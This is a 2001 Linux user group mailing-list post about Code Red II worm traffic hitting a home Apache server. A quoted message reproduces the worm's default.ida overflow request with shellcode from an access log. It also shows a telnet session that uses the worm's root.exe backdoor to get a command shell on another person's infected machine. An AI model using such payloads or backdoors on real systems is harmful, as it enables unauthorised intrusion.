Re: [MLUG - DISCUSSION] Code Red II

Email address obfuscation in effect -- please click here to turn it off.

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: EMAIL:PROTECTED
Subject: Re: [MLUG - DISCUSSION] Code Red II
From: John Engelbrecht <EMAIL:PROTECTED>
Date: Sun, 5 Aug 2001 10:28:16 -0500 (CDT)
In-Reply-To: <EMAIL:PROTECTED>
Reply-To: EMAIL:PROTECTED
Sender: EMAIL:PROTECTED

I have 
I'm getting tired of this
and my Modem Activity light and been blinking for 2 days
I done netstat and several other stuff see what it is thats 
sending packets here, netstat and everything else shows nothin
unusual, the apache access_log is only thing that is. And its not just 
1 IP Address.

Oh, even when I turn off my server thats going to the 
Cable modem, The modem still blinks.

Based on rate of Blinking, it looks like a 56k modem user
is pinging me or something


I probably have 10 pages of the XXXXXX thing just from 
yesterday

On Sun, 5 Aug 2001, Mark Rages wrote:

> Have you all seen this?
> 
> EMAIL:PROTECTED:~$ tail -f /var/log/apache/access.log
> [a bunch of nearly identical entries, one chosen at random:]
> 24.12.165.106 - - [05/Aug/2001:05:04:28 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205
> 
> EMAIL:PROTECTED:~$ telnet 24.12.165.106 80
> Trying 24.12.165.106...
> Connected to 24.12.165.106.
> Escape character is '^]'.
> GET /scripts/root.exe HTTP/1.0
> 
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Sun, 05 Aug 2001 09:15:48 GMT
> Content-Type: application/octet-stream
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-1999 Microsoft Corp.
> 
> c:\inetpub\scripts>
> 
> EMAIL:PROTECTED:~$ grep -c default\.ida\?XXXXX /var/log/apache/access.log
> 357
> 
> And that's just since the first of the new scan appeared at 2:00
> Saturday afternoon.
> 
> rootshells for everyone!
> -- 
> Mark Rages
> EMAIL:PROTECTED           
> http://mlug.missouri.edu/~markrages
> The beginning is near.
> --
> To manage your subscription, go to http://mlug.missouri.edu/members/edit.php
> 
> Archives are available at http://mlug.missouri.edu/list-archives/
> 

--
To manage your subscription, go to http://mlug.missouri.edu/members/edit.php

Archives are available at http://mlug.missouri.edu/list-archives/

Follow-Ups:
- Re: [MLUG - DISCUSSION] Code Red II
  - From: Ian Monroe <EMAIL:PROTECTED>

References:
- [MLUG - DISCUSSION] Code Red II
  - From: Mark Rages <EMAIL:PROTECTED>

Prev by Date: [MLUG - DISCUSSION] Code Red II
Next by Date: Re: [MLUG - DISCUSSION] Code Red II
Previous by thread: [MLUG - DISCUSSION] Code Red II
Next by thread: Re: [MLUG - DISCUSSION] Code Red II
Index(es):
- Date
- Thread